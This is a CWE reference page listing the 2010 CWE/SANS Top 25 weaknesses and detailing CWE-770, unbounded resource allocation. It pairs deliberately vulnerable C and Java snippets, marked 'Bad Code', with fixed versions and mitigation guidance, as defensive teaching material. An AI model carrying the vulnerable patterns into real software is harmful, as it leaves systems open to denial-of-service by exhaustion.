
CWE VIEW: Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors

View ID: 800
Structure: Graph
Status: Incomplete

View Objective

CWE entries in this view (graph) are listed in the 2010 CWE/SANS Top 25 Programming Errors.

+ View Audience
Stakeholder | Description
Developers

By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software.

Software_Customers

If a software developer claims to be following the Top 25, then customers can use the weaknesses in this view in order to formulate independent evidence of that claim.

Educators

Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25.

+ Relationships
800 - Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors
+ Category: 2010 Top 25 - Insecure Interaction Between Components - (801)
  Weaknesses in this category are listed in the "Insecure Interaction Between Components" section of the 2010 CWE/SANS Top 25 Programming Errors.
  * Weakness Class: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') - (362)
    The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.
  * Compound Element (Composite): Cross-Site Request Forgery (CSRF) - (352)
    The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. Alternate terms: Session Riding, Cross Site Reference Forgery, XSRF.
    * Weakness Class: External Control of Critical State Data - (642)
      The software stores security-critical state information about its users, or the software itself, in a location that is accessible to unauthorized actors.
    * Weakness Base: Insufficient Session Expiration - (613)
      According to WASC, "Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."
    * Weakness Base: Origin Validation Error - (346)
      The software does not properly verify that the source of data or communication is valid.
    * Weakness Class: Unintended Proxy or Intermediary ('Confused Deputy') - (441)
      The software receives a request, message, or directive from an upstream component, but the software does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the software's control sphere. This causes the software to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor. Alternate term: Confused Deputy.
  * Weakness Base: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - (79)
    The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Alternate terms: XSS, CSS.
  * Weakness Base: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - (78)
    The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. Alternate terms: Shell injection, Shell metacharacters.
  * Weakness Base: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - (89)
    The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.
  * Weakness Base: Information Exposure Through an Error Message - (209)
    The software generates an error message that includes sensitive information about its environment, users, or associated data.
  * Weakness Variant: URL Redirection to Untrusted Site ('Open Redirect') - (601)
    A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. Alternate terms: Open Redirect, Cross-site Redirect, Cross-domain Redirect.
  * Weakness Base: Unrestricted Upload of File with Dangerous Type - (434)
    The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Alternate term: Unrestricted File Upload.
+ Category: 2010 Top 25 - Porous Defenses - (803)
  Weaknesses in this category are listed in the "Porous Defenses" section of the 2010 CWE/SANS Top 25 Programming Errors.
  * Weakness Class: Improper Authorization - (285)
    The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. Alternate term: AuthZ.
  * Weakness Class: Incorrect Permission Assignment for Critical Resource - (732)
    The software specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.
  * Weakness Variant: Missing Authentication for Critical Function - (306)
    The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
  * Weakness Base: Missing Encryption of Sensitive Data - (311)
    The software does not encrypt sensitive or critical information before storage or transmission.
  * Weakness Base: Reliance on Untrusted Inputs in a Security Decision - (807)
    The application uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.
  * Weakness Base: Use of Hard-coded Credentials - (798)
    The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.
  * Weakness Base: Use of a Broken or Risky Cryptographic Algorithm - (327)
    The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information.
+ Category: 2010 Top 25 - Risky Resource Management - (802)
  Weaknesses in this category are listed in the "Risky Resource Management" section of the 2010 CWE/SANS Top 25 Programming Errors.
  * Weakness Base: Allocation of Resources Without Limits or Throttling - (770)
    The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on how many resources can be allocated, in violation of the intended security policy for that actor.
  * Weakness Base: Buffer Access with Incorrect Length Value - (805)
    The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.
  * Weakness Base: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') - (120)
    The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. Alternate terms: buffer overrun, Unbounded Transfer.
  * Weakness Base: Download of Code Without Integrity Check - (494)
    The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.
  * Weakness Class: Improper Check for Unusual or Exceptional Conditions - (754)
    The software does not check or improperly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the software.
  * Weakness Base: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') - (98)
    The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions. Alternate terms: Remote file include, RFI, Local file inclusion.
  * Weakness Class: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - (22)
    The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Alternate terms: Directory traversal, Path traversal.
  * Weakness Base: Improper Validation of Array Index - (129)
    The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array. Alternate terms: out-of-bounds array index, index-out-of-range, array index underflow.
  * Weakness Base: Incorrect Calculation of Buffer Size - (131)
    The software does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow.
  * Weakness Base: Integer Overflow or Wraparound - (190)
    The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.
+ Category: 2010 Top 25 - Weaknesses On the Cusp - (808)
  Weaknesses in this category are not part of the general Top 25, but they were part of the original nominee list from which the Top 25 was drawn.
  * Weakness Base: Exposed Dangerous Method or Function - (749)
    The software provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
  * Weakness Base: External Initialization of Trusted Variables or Data Stores - (454)
    The software initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.
  * Weakness Base: Guessable CAPTCHA - (804)
    The software uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.
  * Weakness Class: Improper Control of Interaction Frequency - (799)
    The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests. Alternate terms: Insufficient anti-automation, Brute force.
  * Weakness Base: Improper Cross-boundary Removal of Sensitive Data - (212)
    The software uses a resource that contains sensitive data, but it does not properly remove that data before it stores, transfers, or shares the resource with actors in another control sphere.
  * Weakness Base: Improper Link Resolution Before File Access ('Link Following') - (59)
    The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource. Alternate term: insecure temporary file.
  * Weakness Base: Improper Restriction of Excessive Authentication Attempts - (307)
    The software does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks.
  * Weakness Base: Incorrect Conversion between Numeric Types - (681)
    When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.
  * Weakness Base: Missing Initialization of a Variable - (456)
    The software does not initialize critical variables, which causes the execution environment to use unexpected values.
  * Weakness Base: Missing Release of Resource after Effective Lifetime - (772)
    The software does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.
  * Weakness Base: NULL Pointer Dereference - (476)
    A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.
  * Weakness Base: Operation on a Resource after Expiration or Release - (672)
    The software uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked.
  * Compound Element (Composite): Untrusted Search Path - (426)
    The application searches for critical resources using an externally-supplied search path that can point to resources that are not under the application's direct control. Alternate term: Untrusted Path.
    * Weakness Class: Containment Errors (Container Errors) - (216)
      This tries to cover various problems in which improper data are included within a "container."
    * Weakness Base: Modification of Assumed-Immutable Data (MAID) - (471)
      The software does not properly protect an assumed-immutable element from being modified by an attacker.
    * Category: Permission Issues - (275)
      Weaknesses in this category are related to improper assignment or handling of permissions.
  * Weakness Base: Use After Free - (416)
    Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. Alternate terms: Dangling pointer, Use-After-Free.
  * Weakness Base: Use of Externally-Controlled Format String - (134)
    The software uses a function that accepts a format string as an argument, but the format string originates from an external source.
  * Weakness Class: Use of Insufficiently Random Values - (330)
    The software may use insufficiently random numbers or values in a security context that depends on unpredictable numbers.
+ References
"2010 CWE/SANS Top 25 Most Dangerous Programming Errors". 2010-02-04. <http://cwe.mitre.org/top25>.
+ Content History
Submissions
Submission Date | Submitter | Organization | Source
2010-01-15 | Internal CWE Team
+ View Metrics
CWEs in this view / Total CWEs
Total: 45 out of 1006
Views: 0 out of 33
Categories: 4 out of 245
Weaknesses: 39 out of 720
Compound_Elements: 2 out of 8
View Components

CWE-770: Allocation of Resources Without Limits or Throttling

Weakness ID: 770
Abstraction: Base
Status: Incomplete
+ Description

Description Summary

The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on how many resources can be allocated, in violation of the intended security policy for that actor.
+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
  • System Configuration
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
Scope | Effect
Availability

Technical Impact: DoS: resource consumption (CPU); DoS: resource consumption (memory); DoS: resource consumption (other)

When allocating resources without limits, an attacker could prevent other systems, applications, or processes from accessing the same type of resource.

+ Likelihood of Exploit

Medium to High

+ Detection Methods

Manual Static Analysis

Manual static analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. If denial-of-service is not considered a significant risk, or if there is strong emphasis on consequences such as code execution, then manual analysis may not focus on this weakness at all.

Fuzzing

While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find uncontrolled resource allocation problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to limit resource allocation may be the cause.

When the allocation is directly affected by numeric inputs, then fuzzing may produce indications of this weakness.

Effectiveness: Opportunistic

Automated Dynamic Analysis

Certain automated dynamic analysis techniques may be effective in producing side effects of uncontrolled resource allocation problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame. Manual analysis is likely required to interpret the results.

Automated Static Analysis

Specialized configuration or tuning may be required to train automated tools to recognize this weakness.

Automated static analysis typically has limited utility in recognizing unlimited allocation problems, except for the missing release of program-independent system resources such as files, sockets, and processes, or unchecked arguments to memory allocation functions. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired, or if too much of a resource is requested at once, as can occur with memory. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value.

Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day.

+ Demonstrative Examples

Example 1

This code allocates a socket and forks each time it receives a new connection.

(Bad Code)
Example Languages: C and C++ 
sock = socket(AF_INET, SOCK_STREAM, 0);
while (1) {
    newsock = accept(sock, ...);
    printf("A connection has been accepted\n");
    pid = fork();
}

The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely.
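One way to bound this behavior is to track how many children have been forked, reap them when they exit, and refuse new connections once a limit is reached. The following is a minimal sketch only: MAX_CHILDREN, the omitted bind()/listen() setup, and the handle_connection() helper are illustrative, and a production server would need more careful signal-safe bookkeeping.

(Good Code)
Example Language: C
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>

#define MAX_CHILDREN 50   /* illustrative limit on concurrent child processes */

static volatile sig_atomic_t active_children = 0;

/* reap finished children and decrement the running count */
static void reap_children(int sig) {
    (void) sig;
    while (waitpid(-1, NULL, WNOHANG) > 0) {
        if (active_children > 0) active_children--;
    }
}

int main(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = reap_children;
    sa.sa_flags = SA_RESTART;
    sigaction(SIGCHLD, &sa, NULL);

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    /* ... bind() and listen() omitted, as in the example above ... */

    while (1) {
        int newsock = accept(sock, NULL, NULL);
        if (newsock < 0) continue;

        if (active_children >= MAX_CHILDREN) {
            close(newsock);            /* at the limit: refuse instead of forking */
            continue;
        }

        pid_t pid = fork();
        if (pid == 0) {
            /* child: handle the connection, then exit */
            /* handle_connection(newsock); */
            close(newsock);
            _exit(0);
        }
        else if (pid > 0) {
            active_children++;         /* parent: count the new child */
            close(newsock);
        }
        else {
            close(newsock);            /* fork failed: fail closed */
        }
    }
}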

Example 2

In the following example, a server socket connection is used to accept a request to store data on the local file system using a specified filename. The openSocketConnection method establishes a server socket to accept requests from a client. When a client establishes a connection to this service, the getNextMessage method is first used to retrieve the name of the file from the socket, and the openFileToWrite method then validates the filename and opens a file on the local file system for writing. getNextMessage is then used within a while loop to continuously read data from the socket and write it to the file until no more data is available from the socket.

(Bad Code)
Example Languages: C and C++ 
int writeDataFromSocketToFile(char *host, int port)
{
    char filename[FILENAME_SIZE];
    char buffer[BUFFER_SIZE];
    int socket = openSocketConnection(host, port);

    if (socket < 0) {
        printf("Unable to open socket connection");
        return(FAIL);
    }
    if (getNextMessage(socket, filename, FILENAME_SIZE) > 0) {
        if (openFileToWrite(filename) > 0) {
            while (getNextMessage(socket, buffer, BUFFER_SIZE) > 0) {
                if (!(writeToFile(buffer) > 0))
                    break;
            }
        }
        closeFile();
    }
    closeSocket(socket);
    return(SUCCESS);
}

This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients' ability to access the service.
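One possible mitigation is to track how much data has been written for the request and stop once a quota is reached. The fragment below is a sketch: MAX_UPLOAD_BYTES is an illustrative limit, and getNextMessage() is assumed to return the number of bytes it read, which the example above does not specify.

(Good Code)
Example Language: C
#define MAX_UPLOAD_BYTES (10 * 1024 * 1024)   /* illustrative per-request quota */
...
long total = 0;
int n;
while ((n = getNextMessage(socket, buffer, BUFFER_SIZE)) > 0) {
    if (total + n > MAX_UPLOAD_BYTES) {
        /* quota exceeded: stop writing and report an error to the client */
        break;
    }
    if (!(writeToFile(buffer) > 0))
        break;
    total += n;
}
...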

Example 3

In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array.

(Bad Code)
Example Languages: C and C++ 
/* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */
int processMessage(char **message)
{
    char *body;

    int length = getMessageLength(message[0]);

    if (length > 0) {
        body = &message[1][0];
        processMessageBody(body);
        return(SUCCESS);
    }
    else {
        printf("Unable to process message; invalid message length");
        return(FAIL);
    }
}

This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check.

Also, consider changing the type from 'int' to 'unsigned int', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code.

(Good Code)
Example Languages: C and C++ 
unsigned int length = getMessageLength(message[0]);
if ((length > 0) && (length < MAX_LENGTH)) {...}

Example 4

In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket, a separate thread object is generated using the ClientSocketThread class that handles requests made by the client through the socket.

(Bad Code)
Example Language: Java 
public void acceptConnections() {
    try {
        ServerSocket serverSocket = new ServerSocket(SERVER_PORT);
        int counter = 0;
        boolean hasConnections = true;
        while (hasConnections) {
            Socket client = serverSocket.accept();
            Thread t = new Thread(new ClientSocketThread(client));
            t.setName(client.getInetAddress().getHostName() + ":" + counter++);
            t.start();
        }
        serverSocket.close();
    } catch (IOException ex) {...}
}

In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources.

The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated.

(Good Code)
Example Language: Java 
public static final int SERVER_PORT = 4444;
public static final int MAX_CONNECTIONS = 10;
...

public void acceptConnections() {
    try {
        ServerSocket serverSocket = new ServerSocket(SERVER_PORT);
        // create the bounded pool once, outside the accept loop
        ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);
        boolean hasConnections = true;
        while (hasConnections) {
            hasConnections = checkForMoreConnections();
            Socket client = serverSocket.accept();
            // hand the connection to the pool; at most MAX_CONNECTIONS handlers run concurrently
            pool.execute(new ClientSocketThread(client));
        }
        serverSocket.close();
        pool.shutdown();
    } catch (IOException ex) {...}
}

Example 5

An unnamed web site allowed a user to purchase tickets for an event. A menu option allowed the user to purchase up to 10 tickets, but the back end did not restrict the actual number of tickets that could be purchased.

Example 5 References:

Rafal Los. "Real-Life Example of a 'Business Logic Defect' (Screen Shots!)". 2011. <http://h30501.www3.hp.com/t5/Following-the-White-Rabbit-A/Real-Life-Example-of-a-Business-Logic-Defect-Screen-Shots/ba-p/22581>.
+ Observed Examples
Reference | Description
Language interpreter does not restrict the number of temporary files being created when handling a MIME request with a large number of parts.
Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption.
Large integer value for a length property in an object causes a large amount of memory allocation.
Product allows exhaustion of file descriptors when processing a large number of TCP packets.
Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created.
Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window.
CMS does not restrict the number of searches that can occur simultaneously, leading to resource exhaustion.
+ Potential Mitigations

Phase: Requirements

Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits.

Phase: Architecture and Design

Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410.

Phase: Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place, and it will help the administrator to identify who is committing the abuse. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
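A fixed-window rate limiter is one simple way to implement such throttling. The sketch below is illustrative only: the table size, limits, and the allow_request() interface are assumptions, and a real deployment would also need locking, eviction of stale entries, and coordination across processes.

Example Language: C
#include <stdio.h>
#include <string.h>
#include <time.h>

#define MAX_USERS       1024   /* illustrative table size */
#define MAX_REQUESTS    100    /* illustrative per-user limit per window */
#define WINDOW_SECONDS  60

struct rate_entry {
    char   user[64];
    time_t window_start;
    int    count;
};

static struct rate_entry table[MAX_USERS];

/* returns 1 if the request should be allowed, 0 if it should be throttled */
int allow_request(const char *user) {
    time_t now = time(NULL);
    for (int i = 0; i < MAX_USERS; i++) {
        if (table[i].user[0] == '\0' || strcmp(table[i].user, user) == 0) {
            if (table[i].user[0] == '\0') {
                /* first request from this user: claim the slot */
                snprintf(table[i].user, sizeof(table[i].user), "%s", user);
                table[i].window_start = now;
                table[i].count = 0;
            }
            if (now - table[i].window_start >= WINDOW_SECONDS) {
                table[i].window_start = now;   /* start a new window */
                table[i].count = 0;
            }
            if (table[i].count >= MAX_REQUESTS)
                return 0;                      /* over the limit: throttle */
            table[i].count++;
            return 1;
        }
    }
    return 0;   /* table full: fail closed rather than allow unbounded users */
}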

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

This will only be applicable to cases where user input can influence the size or frequency of resource allocations.
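For example, when a request can influence an allocation size, the requested size can be checked against a documented maximum before any memory is reserved. This is a sketch; MAX_ALLOC_BYTES and allocate_for_request() are illustrative names.

Example Language: C
#include <stdlib.h>

#define MAX_ALLOC_BYTES (1024 * 1024)   /* illustrative documented maximum */

void *allocate_for_request(long requested) {
    /* accept only sizes that are positive and within the documented maximum */
    if (requested <= 0 || requested > MAX_ALLOC_BYTES)
        return NULL;
    return malloc((size_t) requested);
}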

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design

Mitigation of resource exhaustion attacks requires that the target system either:

  • recognizes the attack and denies that user further access for a given amount of time, typically by using increasing time delays

  • uniformly throttles all requests in order to make it more difficult to consume resources faster than they can be freed.

The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, he may be able to prevent the user from accessing the server in question.

The second solution can be difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply requires more resources on the part of the attacker.

Phase: Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Phases: Architecture and Design; Implementation

If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.

Ensure that all failures in resource allocation place the system into a safe posture.
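For instance, a failed allocation can be turned into an explicit, logged rejection of the current request rather than continued execution with an invalid buffer. The sketch below assumes an illustrative load_message() helper.

Example Language: C
#include <stdio.h>
#include <stdlib.h>

char *load_message(size_t len) {
    char *buf = malloc(len);
    if (buf == NULL) {
        /* allocation failed: log it and reject this request, leaving the
           rest of the system in a safe, known state */
        fprintf(stderr, "allocation of %zu bytes failed; rejecting request\n", len);
        return NULL;
    }
    return buf;
}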

Phases: Operation; Architecture and Design

Strategy: Limit Resource Consumption

Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.

When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.

Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703).
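The following sketch shows the setrlimit()/getrlimit() approach mentioned above on a POSIX system; the descriptor limit of 256 is arbitrary, and RLIMIT_NOFILE is only one of several resource types that can be constrained.

Example Language: C
#include <stdio.h>
#include <sys/resource.h>

int main(void) {
    struct rlimit rl;

    /* query the current limits on open file descriptors */
    if (getrlimit(RLIMIT_NOFILE, &rl) == 0)
        printf("soft limit: %llu, hard limit: %llu\n",
               (unsigned long long) rl.rlim_cur,
               (unsigned long long) rl.rlim_max);

    /* lower the soft limit so a runaway descriptor leak fails early */
    rl.rlim_cur = 256;
    if (setrlimit(RLIMIT_NOFILE, &rl) != 0)
        perror("setrlimit");

    return 0;
}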

+ Relationships
Nature | Type | ID | Name | View(s) this relationship pertains to
ChildOf | Weakness Base | 400 | Uncontrolled Resource Consumption ('Resource Exhaustion') | Development Concepts (primary) 699; Research Concepts 1000
ChildOf | Weakness Class | 665 | Improper Initialization | Research Concepts (primary) 1000
ChildOf | Category | 802 | 2010 Top 25 - Risky Resource Management | Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary) 800
ChildOf | Category | 840 | Business Logic Errors | Development Concepts 699
ChildOf | Category | 857 | CERT Java Secure Coding Section 12 - Input Output (FIO) | Weaknesses Addressed by the CERT Java Secure Coding Standard 844
ChildOf | Category | 858 | CERT Java Secure Coding Section 13 - Serialization (SER) | Weaknesses Addressed by the CERT Java Secure Coding Standard 844
ChildOf | Category | 861 | CERT Java Secure Coding Section 49 - Miscellaneous (MSC) | Weaknesses Addressed by the CERT Java Secure Coding Standard (primary) 844
ChildOf | Category | 867 | 2011 Top 25 - Weaknesses On the Cusp | Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary) 900
ChildOf | Category | 876 | CERT C++ Secure Coding Section 08 - Memory Management (MEM) | Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary) 868
ChildOf | Category | 877 | CERT C++ Secure Coding Section 09 - Input Output (FIO) | Weaknesses Addressed by the CERT C++ Secure Coding Standard 868
ChildOf | Category | 985 | SFP Secondary Cluster: Unrestricted Consumption | Software Fault Pattern (SFP) Clusters (primary) 888
ParentOf | Weakness Variant | 774 | Allocation of File Descriptors or Handles Without Limits or Throttling | Research Concepts (primary) 1000
ParentOf | Weakness Variant | 789 | Uncontrolled Memory Allocation | Development Concepts (primary) 699; Research Concepts (primary) 1000
MemberOf | View | 884 | CWE Cross-section | CWE Cross-section (primary) 884
+ Theoretical Notes

Vulnerability theory is largely about how behaviors and resources interact. "Resource exhaustion" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place.

+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Mapped Node Name
CERT Java Secure Coding | FIO04-J | Close resources when they are no longer needed
CERT Java Secure Coding | SER12-J | Avoid memory and resource leaks during serialization
CERT Java Secure Coding | MSC05-J | Do not exhaust heap space
CERT C++ Secure Coding | MEM12-CPP | Do not assume infinite heap space
CERT C++ Secure Coding | FIO42-CPP | Ensure files are properly closed when they are no longer needed
+ References
Joao Antunes, Nuno Ferreira Neves and Paulo Verissimo. "Detection and Prediction of Resource-Exhaustion Vulnerabilities". Proceedings of the IEEE International Symposium on Software Reliability Engineering (ISSRE). November 2008. <http://homepages.di.fc.ul.pt/~nuno/PAPERS/ISSRE08.pdf>.
D.J. Bernstein. "Resource exhaustion". <http://cr.yp.to/docs/resources.html>.
Pascal Meunier. "Resource exhaustion". Secure Programming Educational Material. 2004. <http://homes.cerias.purdue.edu/~pmeunier/secprog/sanitized/class1/6.resource%20exhaustion.ppt>.
[REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 17, "Protecting Against Denial of Service Attacks" Page 517. 2nd Edition. Microsoft. 2002.
Frank Kim. "Top 25 Series - Rank 22 - Allocation of Resources Without Limits or Throttling". SANS Software Security Institute. 2010-03-23. <http://blogs.sans.org/appsecstreetfighter/2010/03/23/top-25-series-rank-22-allocation-of-resources-without-limits-or-throttling/>.
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 10, "Resource Limits", Page 574. 1st Edition. Addison Wesley. 2006.
+ Maintenance Notes

"Resource exhaustion" (CWE-400) is currently treated as a weakness, although it is more like a category of weaknesses that all have the same type of consequence. While this entry treats CWE-400 as a parent in view 1000, the relationship is probably more appropriately described as a chain.

+ Content History
Submissions
Submission Date | Submitter | Organization | Source
2009-05-13 | Internal CWE Team
Modifications
Modification Date | Modifier | Organization | Source
2009-07-27 | CWE Content Team | MITRE | Internal: updated Related_Attack_Patterns
2009-10-29 | CWE Content Team | MITRE | Internal: updated Relationships
2009-12-28 | CWE Content Team | MITRE | Internal: updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Observed_Examples, References, Time_of_Introduction
2010-02-16 | CWE Content Team | MITRE | Internal: updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2010-04-05 | CWE Content Team | MITRE | Internal: updated Common_Consequences, Demonstrative_Examples, Related_Attack_Patterns
2010-06-21 | CWE Content Team | MITRE | Internal: updated Common_Consequences, Potential_Mitigations, References
2010-09-27 | CWE Content Team | MITRE | Internal: updated Demonstrative_Examples, Potential_Mitigations
2011-03-29 | CWE Content Team | MITRE | Internal: updated Demonstrative_Examples, Detection_Factors, Relationships
2011-06-01 | CWE Content Team | MITRE | Internal: updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27 | CWE Content Team | MITRE | Internal: updated Relationships
2011-09-13 | CWE Content Team | MITRE | Internal: updated Relationships, Taxonomy_Mappings
